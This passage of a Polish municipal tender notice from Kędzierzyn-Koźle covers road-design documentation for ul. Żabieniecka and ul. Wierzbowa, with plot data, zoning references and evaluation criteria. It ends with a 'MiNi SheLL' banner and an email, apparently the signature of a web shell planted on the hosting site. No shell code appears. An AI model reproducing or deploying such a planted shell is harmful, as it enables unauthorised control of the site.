7.Dodatkowo informujemy, że dokumentacja projektowa musi być spójna z zatwierdzoną i realizowaną dokumentacją projektową Przebudowy ulicy Chełmońskiego w Kędzierzynie-Koźlu w zakresie skrzyżowania ulic Chełmońskiego, Pocztowej i Marynarskiej.Zamawiający informuje, iż nie stawia wymogu określonego w art. 29 ust. 3a Ustawy Pzp, polegającego na tym, że osoby zaangażowane w realizację zamówienia były zatrudnione na umowie o pracę na podstawie ustawy z dnia 26 czerwca 1974 roku Kodeks Pracy (Dz. U. z 2014r., poz. 1502 z późn. zm).
Szczegółowy opis przedmiotu zamówienia określa niniejsza SIWZ oraz cz. III SIWZ - Opis przedmiotu zamówienia, cz. II Istotne postanowienia umowy wraz z załącznikami zamieszczone w wersji elektronicznej na stronie internetowej Zamawiającego: http://przetargi.kedzierzynkozle.pl/ stanowiące integralną częścią SIWZ.
 <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71322000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena całkowita brutto </td><td>60</td></tr><tr><td>Termin wykonania zamówienia</td><td>20</td></tr><tr><td>Doświadczenie projektanta branży drogowej</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin wykonania zamówienia należy podać w tygodniach.Zamówienie należy zrealizować w terminie ustalonym w ofercie Wykonawcy zgodnie z zasadami wskazanymi w niniejszej SIWZ i przypadającym w okresie nie dłuższym niż 40 tygodni od daty zawarcia umowy.<br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Dokumentacja projektowo-kosztorysowa rozbudowy pasa drogowego ul. Żabienieckiej o chodnik w Kędzierzynie-Koźlu<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ II - Dokumentacja projektowo-kosztorysowa rozbudowy pasa drogowego ul. Żabienieckiej o chodnik w Kędzierzynie-Koźlu
  Wspólny słownik zamówień (CPV): 71.32.20.00-1
1.Celem niniejszego zamówienia jest wyłonienie Wykonawcy na świadczenie usług dla potrzeb rozbudowy pasa drogowego ul. Żabienieckiej o chodnik, a obejmujących w szczególności:
1)wykonanie opracowań przedprojektowych:
a)opracowań geodezyjnych,
b)dokumentacji geotechnicznej;
2)opracowanie koncepcji programowej rozbudowy drogi  jej pozytywne uzgodnienie z Zamawiającym, zarządcami dróg i właściwą Radą Osiedla;
3)przygotowanie niezbędnych materiałów do wydania decyzji o zezwoleniu na realizację inwestycji drogowej (zwaną dalej ZRID) w trybie ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych, w tym opracowanie:
a)wielobranżowego projektu budowlanego wraz z informacja dotyczącą bezpieczeństwa i ochrony zdrowia i zbiorem wszystkich wymaganych przepisami prawa warunków, uzgodnień, opinii czy decyzji (zwanym dalej dokumentami formalno-prawnymi),
b)projektu stałej organizacji ruchu,
c)pozostałych materiałów wymaganych do wniosku o wydanie ZRID,
d)kompletnej dokumentacji geodezyjno-prawnej związanej z nabyciem nieruchomości położonych w liniach rozgraniczających nowego pasa i czasowym korzystaniem z nieruchomości w związku z prowadzeniem robót na ich terenie,
e)dokumentacji do odszkodowań oraz uzyskanie w imieniu i na rzecz Zamawiającego przedmiotowej decyzji;
4)przygotowanie dokumentacji do zgłoszenia robót niewymagających pozwolenia na budowę lub dla obiektów do rozbiórki poza liniami rozgraniczającymi drogę (w razie konieczności),
5)dostarczenie Zamawiającemu kompletnej dokumentacji do przeprowadzenia procedury przetargowej na wykonanie robót, w tym:
a)projekty wykonawcze poszczególnych branż,
b)specyfikacje techniczne wykonania i odbioru robót budowlanych dla ww. branż,
c)przedmiary robót dla ww. branż,
d)kosztorys inwestorski wraz z zestawieniem kosztów inwestycji;
6)stabilizacja granic pasa drogowego raz przekazanie szkicu geodezyjnego po jej przeprowadzeniu;
2.Inwestycja, do której odnosi się niniejsze zamówienie zlokalizowana jest w Kędzierzynie-Koźlu przy ul. Żabienieckiej  i na działkach oznaczonych  numerami 798/4, 683/3, 683/2, 601, 798/5. Nie wyklucza się dodatkowych działek związanych z przyłączeniem obiektu do mediów zewnętrznych.
3.Działki nr 798/4 o powierzchni 0,8525  ha jest pasem drogowym ul. Żabienieckiej, działka nr 683/2 o powierzchni 0,0050 ha jest pasem drogowym ul. Żabienieckiej, działka nr 683/3 o powierzchni 0,0875 ha jest pasem drogowym ul. Żabienieckiej, działka nr 798/5 o powierzchni 0,1317 ha jest pasem drogowym ul. Żabienieckiej i stanowią własność Gminy Kędzierzyn-Koźle.
4.Informujemy, że Gmina Kędzierzyn Koźle ma uchwalony miejscowy plan zagospodarowania przestrzennego miasta (oznaczony dalej skrótem m.p.z.p.), zatwierdzony Uchwałą Rady Miasta Kędzierzyn-Koźle Nr IX/98/2003 z dnia 22.05.2003 r. (Dziennik Urzędowy Województwa Opolskiego Nr 50, poz. 1038 z dnia 01.07.2003 r.), co oznacza, że ustalenie przeznaczenia terenu, rozmieszczenie inwestycji celu publicznego oraz określenie sposobów zagospodarowania  i warunków zabudowy terenu następuje właśnie w m.p.z.p.
5.Zgodnie z zapisami m.p.z.p. teren inwestycji położony jest:
5)na terenie funkcjonalnym określonym jako tereny zabudowy mieszkaniowej wielorodzinnej niskiej i usług nieuciążliwych MWNU, w ramach jednostki planistycznej D-Kłodnica;
6)w granicy strefy B ochrony konserwatorskiej;
7)część działki 798/4, 798/5 : przeznaczenie funkcjonalne ZP  tereny zieleni parkowej, część działek : KL  drogi publiczne klasy drogi lokalnej;
6.Istotne informacje :
Na zlecenie Zarządu Dróg Wojewódzkich została opracowana dokumentacja projektowa związku z budową sygnalizacji świetlnej na istniejącym przejściu dla pieszych na skrzyżowaniu ul. Kłodnickiej  z ul. Szymanowskiego i ul. Kłosową. W swym zakresie obejmuje rejon wlotu ul. Żabienieckiej do ul. Kłodnickiej.Zamawiający informuje, iż nie stawia wymogu określonego w art. 29 ust. 3a Ustawy Pzp, polegającego na tym, że osoby zaangażowane w realizację zamówienia były zatrudnione na umowie o pracę na podstawie ustawy z dnia 26 czerwca 1974 roku Kodeks Pracy (Dz. U. z 2014r., poz. 1502 z późn. zm).
Szczegółowy opis przedmiotu zamówienia określa niniejsza SIWZ oraz cz. III SIWZ - Opis przedmiotu zamówienia, cz. II Istotne postanowienia umowy wraz z załącznikami zamieszczone w wersji elektronicznej na stronie internetowej Zamawiającego: http://przetargi.kedzierzynkozle.pl/ stanowiące integralną częścią SIWZ.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71322000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena całkowita brutto </td><td>60</td></tr><tr><td>Termin wykonania zamówienia</td><td>20</td></tr><tr><td>Doświadczenie projektanta branży drogowej</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin wykonania zamówienia należy podać w tygodniach.Zamówienie należy zrealizować w terminie ustalonym w ofercie Wykonawcy zgodnie z zasadami wskazanymi w niniejszej SIWZ i przypadającym w okresie nie dłuższym niż 41 tygodni od daty zawarcia umowy.<br /></div></div><br /></div><div><b>Część nr: </b>III
                  
                <b>Nazwa: </b>Dokumentacja projektowo-kosztorysowa przebudowy  ul. Wierzbowej w Kędzierzynie-Koźlu<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ III - Dokumentacja projektowo-kosztorysowa przebudowy  ul. Wierzbowej w Kędzierzynie-Koźlu
  Wspólny słownik zamówień (CPV): 71.32.20.00-1
1.Celem niniejszego zamówienia jest wyłonienie Wykonawcy na świadczenie usług dla potrzeb przebudowy i rozbudowy pasa drogowego ul. Wierzbowej w Kędzierzynie-Koźlu, a obejmujących w szczególności:
1)wykonanie opracowań przedprojektowych:
a)opracowań geodezyjnych,
b)dokumentacji geotechnicznej;
2)opracowanie wariantowej koncepcji programowej drogi i jej pozytywne uzgodnienie z Zamawiającym, zarządcą drogi, Radą Osiedla Pogorzelec i RSM CHEMIK;
3)przygotowanie niezbędnych materiałów do wydania decyzji o zezwoleniu na realizację inwestycji drogowej (zwaną dalej ZRID) w trybie ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych, w tym opracowanie:
a)wielobranżowego projektu budowlanego wraz z informacją dotyczącą bezpieczeństwa i ochrony zdrowia i zbiorem wszystkich wymaganych przepisami prawa warunków, uzgodnień, opinii czy decyzji (zwanym dalej dokumentami formalno-prawnymi),
b)projektu stałej organizacji ruchu,
c)pozostałych materiałów wymaganych do wniosku o wydanie ZRID,
d)kompletnej dokumentacji geodezyjno-prawnej związanej z nabyciem nieruchomości położonych w liniach rozgraniczających nowego pasa i czasowym korzystaniem z nieruchomości w związku z prowadzeniem robót na ich terenie,
e)dokumentacji do odszkodowań oraz uzyskanie w imieniu i na rzecz Zamawiającego przedmiotowej decyzji;
4)przygotowanie dokumentacji do zgłoszenia robót niewymagających pozwolenia na budowę lub dla obiektów do rozbiórki poza liniami rozgraniczającymi drogę (w razie konieczności),
5)dostarczenie Zamawiającemu kompletnej dokumentacji do przeprowadzenia procedury przetargowej na wykonanie robót, w tym:
a)projekty wykonawcze poszczególnych branż,
b)specyfikacje techniczne wykonania i odbioru robót budowlanych dla ww. branż,
c)przedmiary robót dla ww. branż,
d)kosztorys inwestorski wraz z zestawieniem kosztów inwestycji;
6)stabilizacja granic pasa drogowego oraz przekazanie szkicu geodezyjnego po jej przeprowadzeniu.
2.Inwestycja, do której odnosi się niniejsze zamówienie zlokalizowana jest w obrębie Kędzierzyn na działce oznaczonej numerem 863/39  (ark. m. 5). Będzie konieczność uwzględnienia dodatkowych działek związanych z rozbudową ulicy, powiązaniem z istniejącymi dojazdami, ciągami pieszymi, dojściami do posesji (klatek schodowych), przebudową uzbrojenia.
3.Działka ww. ma powierzchnię 0,2748 ha i stanowi własność Gminy Kędzierzyn-Koźle (KW 50016).
4.Informujemy, że Gmina Kędzierzyn Koźle ma uchwalony miejscowy plan zagospodarowania przestrzennego miasta (oznaczony dalej skrótem m.p.z.p.), zatwierdzony Uchwałą Rady Miasta Kędzierzyn-Koźle Nr IX/98/2003 z dnia 22.05.2003 r. (Dziennik Urzędowy Województwa Opolskiego Nr 50, poz. 1038 z dnia 01.07.2003 r.), co oznacza, że ustalenie przeznaczenia terenu, rozmieszczenie inwestycji celu publicznego oraz określenie sposobów zagospodarowania i warunków zabudowy terenu następuje właśnie w m.p.z.p.
5.	Zgodnie z zapisami m.p.z.p. teren inwestycji położony jest na terenie funkcjonalnym określonym jako tereny zabudowy mieszkaniowej wielorodzinnej i usług nieuciążliwych o symbolu MWU w ramach jednostki planistycznej F  Kędzierzyn Pogorzelec.
6.Ul. Wierzbowa podlegająca przebudowie i rozbudowie jest drogą bez przejazdu rozpoczynającą swój przebieg od Placu Jana Surzyckiego i na podstawie zapisów w mpzp powinna się kończyć placem manewrowym o pow. 400m2 i ukształtowanym w sposób umożliwiający właściwe manewrowanie pojazdami technicznymi i ratownictwa.
7.	Dodatkowo informujemy, że firma AQWA s.c. z Głubczyc na zlecenie Zamawiającego opracowuje projekt placu zabaw przy Przedszkolu Publicznym nr 23 ul. Wierzbowej 4 (w załączeniu rysunek zagospodarowania terenu). 

Zamawiający informuje, iż nie stawia wymogu określonego w art. 29 ust. 3a Ustawy Pzp, polegającego na tym, że osoby zaangażowane w realizację zamówienia były zatrudnione na umowie o pracę na podstawie ustawy z dnia 26 czerwca 1974 roku Kodeks Pracy (Dz. U. z 2014r., poz. 1502 z późn. zm).

Szczegółowy opis przedmiotu zamówienia określa niniejsza SIWZ oraz cz. III SIWZ - Opis przedmiotu zamówienia, cz. II Istotne postanowienia umowy wraz z załącznikami zamieszczone w wersji elektronicznej na stronie internetowej Zamawiającego: http://przetargi.kedzierzynkozle.pl/ stanowiące integralną częścią SIWZ.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71322000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 240<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena całkowita brutto </td><td>60</td></tr><tr><td>Termin wykonania zamówienia</td><td>20</td></tr><tr><td>Doświadczenie projektanta branży drogowej</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin wykonania zamówienia należy podać w dniach.Zamówienie należy zrealizować w terminie ustalonym w ofercie Wykonawcy zgodnie z zasadami wskazanymi w niniejszej SIWZ i przypadającym w okresie nie dłuższym niż 240 dni kalendarzowych od daty zawarcia umowy.<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com